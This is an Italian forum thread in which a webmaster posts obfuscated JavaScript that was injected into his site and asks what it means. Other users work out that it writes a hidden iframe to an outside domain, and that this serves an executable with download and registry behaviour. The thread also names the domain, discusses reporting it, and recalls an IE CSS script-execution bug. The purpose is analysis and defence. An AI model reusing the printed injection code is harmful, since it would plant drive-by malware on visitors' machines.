Pagina 1 di 3 1 2 3 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 28
  1. #1
    Utente di HTML.it L'avatar di flessciato
    Registrato dal
    Jun 2002
    Messaggi
    1,522

    solo per veri Guru: significato script

    codice:
    <script language=javascript>document.write(unescape('<script language="javascript">functionXXX dF(q){
    var q1=unescape(q.substr(0,q.length-1)); 
    vart='';
    for(i=0;i<q1.length;i++)t+=String.fromCharCode(q1.charCodeAt(i)-q.substr(q.length-1,1));
    document.write(unescape(t));}</script>'));
    dF('&4Djgsbnf&31tsd&4E&38iuuq&4B00usbg/to.ofu/jogp0pvu/qiq&4Gt`je&4E2&38&31gsbnfcpsefs&4E1
    &31ifjhiu&4E2&31xjeui&4E2&4F&4D0jgsbnf&4F1')</script>
    <script language=javascript>document.write(unescape('<script language="javascript">functionXXX dF(q){
    var q1=unescape(q.substr(0,q.length-1)); 
    var t='';
    for(i=0;i<q1.length;i++)t+=String.fromCharCode(q1.charCodeAt(i)-q.substr(q.length-1,1));
    document.write(unescape(t));}</script>'));
    dF('-;Kqnzium-:8{zk-;L-::p||x-;I77|zin6{v5vm|6qvnw7w}|6xpx-;N{gql-;L9-::-:8nziumjwzlmz-;L-:
    :8-::-:8pmqop|-;L-::9-::-:8�ql|p-;L-::9-::-;M-;K7qnzium-;M8')</script>
    questo script mi è stato incluso in una pagina web da remoto. Non mi chiedo come hanno fatto, ci metterei troppo tempo...

    vorrei sapere però il significato dello script
    Slack 10 - Apple G5 2.5 - winzoz xp
    php/mysql/apache
    Flash MX / roba in 3D / roba per il video e l'audio

  2. #2
    Utente di HTML.it L'avatar di kluster
    Registrato dal
    Jul 2003
    Messaggi
    1,288

    Re: solo per veri Guru: significato script

    (non sono certo un guru)
    Basta che al posto di document.write metti un
    alert(unescape(t));
    e ti fa l'alert del codice generato che non è altro che un iframe con un file php che fa scaricare un eseguibile, presumibilmente un virus chiamato w32.exe, anche se il mio antivirus non lo segnala come tale, cmq non lo cliccherei.
    Aprendolo in esadecimale ci sono richiami alla scrittura su registry e brutte scritte URLDownload.
    Mah...

  3. #3
    Utente di HTML.it L'avatar di flessciato
    Registrato dal
    Jun 2002
    Messaggi
    1,522
    la prima parte l'avevo già superata (in php decodificando la stringa).

    Mi interessa la seconda: hai degli URLDownload... vedi i percorsi degli url? me li puoi segnalare?!

    Grazie
    Slack 10 - Apple G5 2.5 - winzoz xp
    php/mysql/apache
    Flash MX / roba in 3D / roba per il video e l'audio

  4. #4
    Utente di HTML.it L'avatar di kluster
    Registrato dal
    Jul 2003
    Messaggi
    1,288
    no sono criptati.
    Cmq vado ad intuito. Se hai decodificato la stringa iniziale hai gia' visto a che sito principale rimanda.


    UN AVVISO.
    ESEGUENDO COSI' COME E' IL CODICE POSTATO POTRESTE INSTALLARVI AUTOMATICAMENTE IL FILE W32.EXE CHE PARTE IN AUTOMATICO.

    Sicchè a livello logico la discussione puo' continuare. Ma se hai ancora la possibilita' di modificare il post sarebbe meglio che tu lo cancellassi o ne cancellassi la parte di richiamo alla funzione DF

  5. #5
    Utente di HTML.it L'avatar di flessciato
    Registrato dal
    Jun 2002
    Messaggi
    1,522
    si installa solo se usi explorer... comunque spezzo la stringa (con firefox almeno no)
    Slack 10 - Apple G5 2.5 - winzoz xp
    php/mysql/apache
    Flash MX / roba in 3D / roba per il video e l'audio

  6. #6
    Utente di HTML.it L'avatar di kluster
    Registrato dal
    Jul 2003
    Messaggi
    1,288
    si, infatti in firefox l'ho tranquillamente scaricato e controllato con un editor esadecimale.
    passando il programma con avast e ricerca euristica cmq ancora non da' nessun alert.
    O l'hanno fatto bene o la ricerca euristica è un po' come un terno al lotto

  7. #7
    Utente di HTML.it L'avatar di flessciato
    Registrato dal
    Jun 2002
    Messaggi
    1,522
    questo è il sito degli (o dell') infami
    http://xtraf.sn-net.info il sito funziona se togli la x (così non è attivo).

    So che è un pò off-topic ma c'è un modo per segnalare un dominio simile (si trova in inghilterra) a "chi di dovere"?!
    Slack 10 - Apple G5 2.5 - winzoz xp
    php/mysql/apache
    Flash MX / roba in 3D / roba per il video e l'audio

  8. #8
    Utente di HTML.it L'avatar di kluster
    Registrato dal
    Jul 2003
    Messaggi
    1,288
    mah sull'Inghilterra non lo so, io qui passerei dal sito della polizia postale
    http://www.poliziadistato.it/pds/inf.../contatti.html

  9. #9
    Utente di HTML.it L'avatar di flessciato
    Registrato dal
    Jun 2002
    Messaggi
    1,522
    si si l'ho visto... è che dall'Italia non credo proprio che si interessino... se è dall'Italia per l'Italia si... sennò perdo solo tempo e magari devo anche subire domande inutili da parte loro. So già che mi sentirei fare le domande, e che non sarebbero fatte all PERSONA (che ho identificato) che ha fatto taroccamenti ai siti
    Slack 10 - Apple G5 2.5 - winzoz xp
    php/mysql/apache
    Flash MX / roba in 3D / roba per il video e l'audio

  10. #10
    Utente di HTML.it L'avatar di kluster
    Registrato dal
    Jul 2003
    Messaggi
    1,288
    ma ha preso il login o ha inserito dinamicamente quel codice?

    Avevo letto dell'attacco via ajax di qualche tempo fa su myspace (o di un servizio simile) che usava il bug dei css di IE (della proprieta' background-image(javascript:....); ) che esegue javascript

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.